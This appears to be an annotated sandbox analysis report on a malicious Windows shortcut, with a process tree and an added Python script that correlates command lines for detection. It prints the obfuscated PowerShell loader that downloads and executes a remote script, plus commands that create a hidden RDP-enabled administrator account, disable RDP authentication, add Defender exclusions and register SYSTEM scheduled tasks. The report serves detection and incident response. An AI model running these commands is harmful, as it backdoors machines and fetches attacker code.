Analysis
max time kernel: 146s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 26-11-2024 10:28

Static task: static1
Behavioral task: behavioral1
  Sample: 02ad87e946a127508c1741205a106e1a05da79f5b20ec10bf1507aae01f949dc.lnk
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 02ad87e946a127508c1741205a106e1a05da79f5b20ec10bf1507aae01f949dc.lnk
  Resource: win10v2004-20241007-en

The signatures and process tree on this page are from the behavioral2 run (Windows 10 2004 x64, resource win10v2004-20241007-en); the Windows 7 run (behavioral1) is not reproduced here.

General
Target: 02ad87e946a127508c1741205a106e1a05da79f5b20ec10bf1507aae01f949dc.lnk
Size: 2KB
MD5: 464e2f94ac97b9bf225d303e0d05f114
SHA1: d8511f96d21071b1d5a4cf923ba84ed1fb67df46
SHA256: 02ad87e946a127508c1741205a106e1a05da79f5b20ec10bf1507aae01f949dc
SHA512: e3e3d3aa76c7d7fc7af1f3d3e339eb3c255d25858fce413479cf8ba43af7137d88dc5cf2127c4b24e30973d65bdd5b76cb9fd0c187604c609f6a1a8438725ff6
Malware Config
(nothing listed)

Signatures

Grants admin privileges (1 TTP)
Uses net.exe to modify the user's privileges. Here this is `net localgroup Administrators _BootUEFI_ /add` (PIDs 2444/4532 in the process tree).

Remote Service Session Hijacking: RDP Hijacking (1 TTP, 4 IoCs)
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
  PID 4892 net.exe, PID 1872 net1.exe, PID 4060 net.exe, PID 1460 net1.exe
Caveat: all four IoCs are `net localgroup "Remote Desktop Users" ... /add` invocations. That grants the newly created account RDP logon rights (account manipulation, T1098, in support of T1021.001 Remote Desktop Protocol); no existing user session is hijacked, so the T1563.002 tag is a keyword match on the group name rather than observed behaviour.

Blocklisted process makes network request (26 IoCs)
  powershell.exe PID 1920: flows 8, 16
  powershell.exe PID 1992: flows 21, 30, 35, 38, 50, 51, 52, 53, 54, 57, 58, 59, 61, 62, 65, 67, 68, 69, 70, 71, 72, 73, 74, 75
Command and Scripting Interpreter: PowerShell (1 TTP, 5 IoCs)
Run Powershell and hide display window.
  powershell.exe PIDs 1920, 2240, 1424, 3080, 1992
(1920 and 1992 are the two downloaders; 3080, 2240 and 1424 each add a Windows Defender path exclusion. See the process tree.)

Indicator Removal: Network Share Connection Removal (1 TTP, 2 IoCs)
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
  PID 1724 net.exe, PID 2200 net1.exe
Caveat: the matched command is `net localgroup "Users" _BootUEFI_ /delete`, which removes the new account from the local Users group. No share connection (`net use ... /delete`) is involved; the sandbox rule keys on `net ... /delete`.

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation (cmd.exe)
Caveat: this fires on the cmd.exe the sandbox uses to launch the sample (PID 3204), not on any attacker-controlled script, and it is routinely raised for cmd.exe in sandbox runs. On its own it is weak evidence of geofencing.

Drops startup file (1 IoC)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.lnk (powershell.exe)
A shortcut named after Google Chrome in the user's Startup folder (persistence via T1547.001); its target is not shown in this report.

Drops file in System32 directory (7 IoCs)
  File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache (powershell.exe)
  File created: C:\Windows\System32\sysmon.bat (cmd.exe)
  File opened for modification: C:\Windows\System32\sysmon.bat (cmd.exe)
  File created: C:\Windows\System32\sysmon2.bat (cmd.exe)
  File opened for modification: C:\Windows\System32\sysmon2.bat (cmd.exe)
  File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
  File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
The two .bat files are the payload (the scheduled tasks run them as SYSTEM). The three config\systemprofile entries are PowerShell's own caches and only show that PowerShell ran under the SYSTEM profile; the name sysmon.bat is presumably chosen to blend in with Sysinternals Sysmon.

Hide Artifacts: Hidden Users (1 TTP, 1 IoC)
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\_BootUEFI_ = "0" (reg.exe)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Permission Groups Discovery: Local Groups (1 TTP)
Attempt to find local system groups and permission settings.

System Location Discovery: System Language Discovery (1 TTP, 7 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (RdrCEF.exe, 6 times; AcroRd32.ex, once)
All seven reads come from Adobe Reader and its CEF child processes while opening the decoy PDF; that is the application's normal locale handling, not discovery by the sample.

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (AcroRd32.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (AcroRd32.exe)
Again attributable to Adobe Reader rather than to the sample.

Modifies Internet Explorer settings (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION (AcroRd32.exe)
(Heading restored from the "Modifies Internet Explorer settings" tag on PID 4440 in the process tree; the key is the standard one set by applications that embed the WebBrowser control.)
Modifies data under HKEY_USERS (64 IoCs)
All 64 entries are written by powershell.exe under \REGISTRY\USER\.DEFAULT, the hive that HKCU resolves to for the LocalSystem account, and they are the usual side effects of PowerShell initialising its certificate stores and WinINet settings rather than deliberate changes. Grouped by key:
  Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\{Root, CA, trust, Disallowed, TrustedPeople, SmartCardRoot} and their Certificates, CRLs and CTLs subkeys
  Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\{CA, trust, Disallowed, TrustedPeople} and their Certificates, CRLs and CTLs subkeys
  Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
  Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ and \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
  Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1", AutoDetect = "0", IntranetName = "1", ProxyBypass = "1"
What this does establish is that the PowerShell instances spawned from sysmon.bat (PIDs 1424 and 1992, the two tagged with this signature) ran as SYSTEM, as requested by the scheduled task's /ru "SYSTEM".

Modifies registry class (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings (powershell.exe)
Runs net.exe

Scheduled Task/Job: Scheduled Task (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID 5004 schtasks.exe, PID 540 schtasks.exe
(Both are /create calls that run a .bat in System32 as SYSTEM: one at every boot, one every 5 minutes. See the process tree.)

Suspicious behavior: EnumeratesProcesses (35 IoCs)
  powershell.exe PID 1920 (5), AcroRd32.exe PID 4440 (20), powershell.exe PID 3080 (2), PID 2240 (2), PID 1424 (2), PID 1992 (4)

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Token: SeDebugPrivilege by powershell.exe PIDs 1920, 3080, 2240, 1424, 1992

Suspicious use of SetWindowsHookEx (4 IoCs)
  AcroRd32.exe PID 4440 (4)

Suspicious use of WriteProcessMemory (64 IoCs)
These are the parent-writes-to-child events that accompany every CreateProcess call, so they document process lineage rather than injection. Parent -> child (sandbox target id, count):
  3204 cmd.exe -> 1920 (84, x2)
  1920 powershell.exe -> 4440 (85, x3), 3080 (92, x2), 4856 (94, x2)
  4856 cmd.exe -> 2240 (96, x2), 960 (97, x2), 1640 (98, x2), 5004 (99, x2), 4812 (100, x2)
  512 cmd.exe -> 4612 (103, x2), 832 (104, x2), 540 (105, x2), 3468 (106, x2)
  1888 cmd.exe -> 1464 (109, x2), 2236 (111, x2), 2444 (113, x2), 4892 (115, x2), 4060 (118, x2), 1724 (122, x2), 3076 (124, x2), 2920 (125, x2), 4332 (126, x2), 1028 (127, x2), 2612 (128, x2)
  1464 net.exe -> 3324 (110, x2); 2236 net.exe -> 5032 (112, x2); 2444 net.exe -> 4532 (114, x2); 4892 net.exe -> 1872 (116, x2); 4060 net.exe -> 1460 (119, x2); 1724 net.exe -> 2200 (123, x2)
  4440 AcroRd32.exe -> 60 (117, x3)
The listing stops at 64 entries, so the later children of PID 1888 (4100, 1424, 1992) do not appear here although they are in the process tree.

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
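The signatures above are keyword matches on individual commands; the actual story only emerges when the net, reg, schtasks and PowerShell command lines in the process tree are correlated. The Python below is an added example (not part of the Triage report or of the malware) that performs that correlation over a constructed event list copied from the tree. The EVENTS list, the regexes and the finding strings are this example's own choices; a real deployment would feed it Sysmon Event ID 1 or Security 4688 records instead.

```python
"""Correlate process-creation command lines into the account-backdoor/RDP pattern.

Added example, not part of the sandbox report. EVENTS is constructed from the
command lines in the process tree: (pid, image, command line).
"""
import base64
import re

EVENTS = [
    (1464, "net.exe", r'net user _BootUEFI_ /add'),
    (2236, "net.exe", r'net user _BootUEFI_ 123456!!! /active:yes /comment:"A account for booting the computer as uefi mode." /fullname:"_BootUEFI_Hosting_ Host Account"'),
    (2444, "net.exe", r'net localgroup Administrators _BootUEFI_ /add'),
    (4892, "net.exe", r'net localgroup "Remote Desktop Users" /add'),
    (4060, "net.exe", r'net localgroup "Remote Desktop Users" _BootUEFI_ /add'),
    (1724, "net.exe", r'net localgroup "Users" _BootUEFI_ /delete'),
    (3076, "reg.exe", r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    (4332, "reg.exe", r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v _BootUEFI_ /t REG_DWORD /d 0 /f'),
    (2612, "reg.exe", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f'),
    (4100, "reg.exe", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f'),
    (3080, "powershell.exe", r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp'),
    (2240, "powershell.exe", "powershell.exe -w hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUwB5AHMAdABlAG0AMwAyACIA"),
    (5004, "schtasks.exe", r'schtasks /create /tn "Intel(R) Ethernet2 Connection 1219-LM" /tr "C:\Windows\System32\sysmon2.bat" /ru "SYSTEM" /sc ONSTART /rl HIGHEST'),
]

ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def normalize(cmdline: str) -> str:
    """Replace a -EncodedCommand blob with the UTF-16LE script it encodes, so the
    rules below see 'Add-MpPreference' instead of base64."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline[: m.start()] + decoded


def triage(events):
    """Return per-account state plus a list of (pid, finding) tuples."""
    created, admins, rdp, hidden = set(), set(), set(), set()
    findings = []
    for pid, _image, raw in events:
        cmd = normalize(raw)
        if m := re.search(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+.*?/add\b", cmd, re.I):
            created.add(m.group(1))
        if m := re.search(r'\blocalgroup\s+"?administrators"?\s+(\S+)\s+/add\b', cmd, re.I):
            admins.add(m.group(1))
        if m := re.search(r'\blocalgroup\s+"remote desktop users"\s+(\S+)\s+/add\b', cmd, re.I):
            rdp.add(m.group(1))
        elif re.search(r'\blocalgroup\s+"remote desktop users"\s+/add\b', cmd, re.I):
            # No member given: this tries to create a group of that name and fails
            # because the built-in group already exists.
            findings.append((pid, "net localgroup with no member: group creation, no effect"))
        if m := re.search(r'\blocalgroup\s+"?users"?\s+(\S+)\s+/delete\b', cmd, re.I):
            findings.append((pid, f"{m.group(1)} removed from Users group (membership change, not a share removal)"))
        if m := re.search(r'specialaccounts\\userlist"?\s+/v\s+(\S+)\s+.*?/d\s+0\b', cmd, re.I):
            hidden.add(m.group(1))
        for value, text in (("fDenyTSConnections", "RDP enabled by policy"),
                            ("UserAuthentication", "RDP NLA disabled"),
                            ("SecurityLayer", "RDP security layer downgraded")):
            if re.search(rf"/v\s+{value}\s+.*?/d\s+0\b", cmd, re.I):
                findings.append((pid, f"{text} ({value}=0)"))
        if m := re.search(r'add-mppreference\s+-exclusionpath\s+("[^"]*"|\S+)', cmd, re.I):
            findings.append((pid, f"Defender exclusion added for {m.group(1)}"))
        if re.search(r'\bschtasks\s+/create\b.*?/ru\s+"?system"?', cmd, re.I):
            tr = re.search(r'/tr\s+("[^"]*"|\S+)', cmd, re.I)
            findings.append((pid, f"SYSTEM scheduled task runs {tr.group(1) if tr else '?'}"))
    # Correlate across events: an account that was created AND elevated/hidden/RDP-enabled.
    for user in sorted(created):
        traits = [t for t, s in (("local admin", admins), ("RDP logon", rdp),
                                 ("hidden from logon screen", hidden)) if user in s]
        if traits:
            findings.append((None, f"backdoor account {user}: " + ", ".join(traits)))
    return {"created": created, "admins": admins, "rdp": rdp, "hidden": hidden, "findings": findings}


if __name__ == "__main__":
    for pid, finding in triage(EVENTS)["findings"]:
        print(f"{pid if pid else '-':>5}  {finding}")
```

The point of `normalize()` is that two of the three Defender exclusions in this tree only exist inside `-EncodedCommand`; a rule that greps raw command lines for `Add-MpPreference` sees one of three. The cross-event correlation at the end is what turns six individually plausible `net` commands into one "hidden local administrator with RDP access" finding.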
Processes
(Indentation shows the parent/child nesting; each process is listed as image path, PID, command line, then the signatures raised on it.)

C:\Windows\system32\cmd.exe  PID:3204
  cmd /c C:\Users\Admin\AppData\Local\Temp\02ad87e946a127508c1741205a106e1a05da79f5b20ec10bf1507aae01f949dc.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  The sandbox starts the shortcut with cmd /c; the shortcut's target, executed as the child below, is the PowerShell one-liner.

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:1920
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -command &{$ty = 'h5&24g#' + 'UofhxvBcjU' + 'bh#n^_fev4df' + 'hhjwh#dhCz' + 'ghii57r6_fr#tKy' + 'jhr9tfKJry'; [string] $aCmd = {(New-xprObject Nxpretxpr.WebCxprlient).DoxprwnlxproadxprStrxprinxprg('ht' + 'txprps:/' + '/xprpaxprn' + 'axprkexpros' + '.xpricxpru/scxprrxprxpriptxprs/scxpr-xpr' + 'xprintxprermexprdixprxpratexpr.pxprs1xpr')}; $rCmd = $aCmd.replace('xpr', ''); $finalExec = iex $rCmd; iex $finalExec; }
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    Stage 1 loader. $ty is unused filler. The script block is cast to a string with the token xpr spliced into every identifier and literal; .replace('xpr', '') restores it to (New-Object Net.WebClient).DownloadString('https://panakeos.icu/scripts/sc-intermediate.ps1'). The first iex evaluates that call (performing the download) and the second iex executes the downloaded script. The later activity of this process (decoy PDF, the Startup-folder Google Chrome.lnk, scheduler-once.bat) therefore comes from the remote script, not from the .lnk itself.

    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe  PID:4440
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Report_Estimiation_SKT_20241112472075939.pdf"
      - System Location Discovery: System Language Discovery
      - Checks processor information in registry
      - Modifies Internet Explorer settings
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      Opens a PDF from %TEMP% for the user, presumably a decoy so that the click appears to have produced a document. The signatures on this process and on its RdrCEF children are Adobe Reader's own behaviour.
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe  PID:60
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        - System Location Discovery: System Language Discovery
        Adobe Reader's Chromium Embedded Framework helper and its GPU/renderer children for the decoy PDF; nothing below this point is attributable to the sample.

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe  PID:3144
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8298B0EEABFA335B2D44BC4EC7F77152 --mojo-platform-channel-handle=1716 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          - System Location Discovery: System Language Discovery

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe  PID:3748
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7202C40AB00C9F1FFA13FC239E6B726B --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7202C40AB00C9F1FFA13FC239E6B726B --renderer-client-id=2 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job /prefetch:1
          - System Location Discovery: System Language Discovery

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe  PID:4376
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D5B9750BB6AF43EB7D741B24C22A746B --mojo-platform-channel-handle=2332 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          - System Location Discovery: System Language Discovery

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe  PID:3600
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AE6CAEC9419EA2786A1979D3C339E576 --mojo-platform-channel-handle=1864 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          - System Location Discovery: System Language Discovery

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe  PID:3408
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=74D3AC928FC0904691F2E7C352F48AC1 --mojo-platform-channel-handle=1944 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          - System Location Discovery: System Language Discovery
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:3080
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      Excludes the user's Temp directory from Windows Defender scanning. Add-MpPreference requires administrative rights; the report does not show whether the call succeeded.

    C:\Windows\System32\cmd.exe  PID:4856
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\scheduler-once.bat"
      - Drops file in System32 directory
      - Suspicious use of WriteProcessMemory
      Runs a batch file from %TEMP%, launched by the stage-1 PowerShell. Its visible actions are the five children below and the creation of C:\Windows\System32\sysmon.bat and sysmon2.bat (the cmd.exe entries under "Drops file in System32 directory" are tagged on this process), which again requires administrative rights.

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:2240
        powershell.exe -w hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUwB5AHMAdABlAG0AMwAyACIA
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        The -EncodedCommand argument is base64 over UTF-16LE and decodes to: Add-MpPreference -ExclusionPath "$env:windir\System32", a Defender exclusion for the directory that receives sysmon.bat and sysmon2.bat.

      C:\Windows\system32\schtasks.exe  PID:960
        schtasks /delete /tn "Intel(R) Ethernet Connection 1219-LM" /f

      C:\Windows\system32\schtasks.exe  PID:1640
        schtasks /delete /tn "Intel(R) Ethernet2 Connection 1219-LM" /f

      C:\Windows\system32\schtasks.exe  PID:5004
        schtasks /create /tn "Intel(R) Ethernet2 Connection 1219-LM" /tr "C:\Windows\System32\sysmon2.bat" /ru "SYSTEM" /sc ONSTART /rl HIGHEST
        - Scheduled Task/Job: Scheduled Task
        After deleting any earlier copies, registers a task named after an Intel NIC driver that runs sysmon2.bat as SYSTEM at every boot. Creating a task with /ru SYSTEM requires administrative rights.

      C:\Windows\system32\schtasks.exe  PID:4812
        schtasks /run /tn "Intel(R) Ethernet2 Connection 1219-LM"
        Starts the task immediately. The resulting cmd.exe appears at the top level below as PID 512 because its parent is the Task Scheduler service, not this process.
C:\Windows\SYSTEM32\cmd.exe  PID:512
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Windows\System32\sysmon2.bat"
  - Suspicious use of WriteProcessMemory
  sysmon2.bat, run as SYSTEM by the boot-time task. Its only visible job is to register and start the second task:

  C:\Windows\system32\schtasks.exe  PID:4612
    schtasks /delete /tn "Intel(R) Ethernet Connection 1219-LM2" /f

  C:\Windows\system32\schtasks.exe  PID:832
    schtasks /delete /tn "Intel(R) Ethernet2 Connection 1219-LM2" /f

  C:\Windows\system32\schtasks.exe  PID:540
    schtasks /create /tn "Intel(R) Ethernet2 Connection 1219-LM2" /tr "C:\Windows\System32\sysmon.bat" /ru "SYSTEM" /sc MINUTE /mo 5 /rl HIGHEST
    - Scheduled Task/Job: Scheduled Task
    sysmon.bat now runs as SYSTEM every 5 minutes, so everything under PID 1888 below is re-applied repeatedly. Deleting the account or re-enabling NLA without removing both tasks and both .bat files is not a durable fix.

  C:\Windows\system32\schtasks.exe  PID:3468
    schtasks /run /tn "Intel(R) Ethernet2 Connection 1219-LM2"
C:\Windows\SYSTEM32\cmd.exe  PID:1888
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Windows\System32\sysmon.bat"
  - Suspicious use of WriteProcessMemory
  sysmon.bat, run as SYSTEM by the 5-minute task. It creates a hidden local administrator, enables RDP, strips the listener's authentication protections and runs the stage-2 downloader.

  C:\Windows\system32\net.exe  PID:1464
    net user _BootUEFI_ /add
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe  PID:3324
      C:\Windows\system32\net1 user _BootUEFI_ /add

  C:\Windows\system32\net.exe  PID:2236
    net user _BootUEFI_ 123456!!! /active:yes /comment:"A account for booting the computer as uefi mode." /fullname:"_BootUEFI_Hosting_ Host Account"
    - Suspicious use of WriteProcessMemory
    Sets the password (123456!!!, passed on the command line and therefore present in any process-creation log), activates the account, and gives it a comment and full name that mimic a firmware/boot service account.

    C:\Windows\system32\net1.exe  PID:5032
      C:\Windows\system32\net1 user _BootUEFI_ 123456!!! /active:yes /comment:"A account for booting the computer as uefi mode." /fullname:"_BootUEFI_Hosting_ Host Account"

  C:\Windows\system32\net.exe  PID:2444
    net localgroup Administrators _BootUEFI_ /add
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe  PID:4532
      C:\Windows\system32\net1 localgroup Administrators _BootUEFI_ /add

